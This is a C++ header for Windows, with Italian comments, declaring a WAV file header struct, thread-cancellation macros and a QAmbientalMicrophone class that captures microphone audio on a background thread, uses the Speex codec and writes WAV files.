#pragma once

#include <Windows.h>
#include "QVistaMicrophone.h"

// XXX da rimuovere in fase di implementazione
#define CANCELLATION_POINT(x) if(x) { x=FALSE; ExitThread(0); }
#define QUERY_CANCELLATION(x,y) if (x) { \
	y=TRUE; while(y) Sleep(200); \
	CloseHandle(x); \
	x = 0; }

typedef struct _WAVESTRUCT{
	UCHAR ucId[4];		// "RIFF"
	UINT uFileLength;	// Lunghezza di tutto il file -8
	UCHAR ucFormat[4];	// "WAVE"
	UCHAR ucFmt[4];		// "fmt "
	UINT uSize;			// 16
	USHORT usAudioFmt;	// 1
	USHORT uChannels;
	UINT uSampleRate;			
	UINT uRate;			// uSampleRate * uChannels * (uBitsPS / 8)
	USHORT uBlockAlign;	// uChannels * (uBitsPS / 8)
	USHORT uBitsPS;
	UCHAR ucData[4];	// "data"
	UINT uDataSize;
} QWAVESTRUCT, *PQWAVESTRUCT;

class QAmbientalMicrophone{
	private:
		DWORD dwTid;
		HANDLE hThread;

	public:
		BOOL bVista, bCalibrate, uChunkLen; // Sono pubblici perche' devono essere accessibili dal thread

	private:
		BOOL ResolveSpeexSymbols();

	public:
		QAmbientalMicrophone(HMODULE hSpeex, BOOL bModify, UINT uChunk);
		~QAmbientalMicrophone();

		static BOOL WaveWrite(PCHAR filename, WAVEFORMATEX wfx, PBYTE data, UINT uLen, BOOL bAppend);

		// Routine del thread principale
		static DWORD WINAPI ThreadProc(LPVOID obj);

};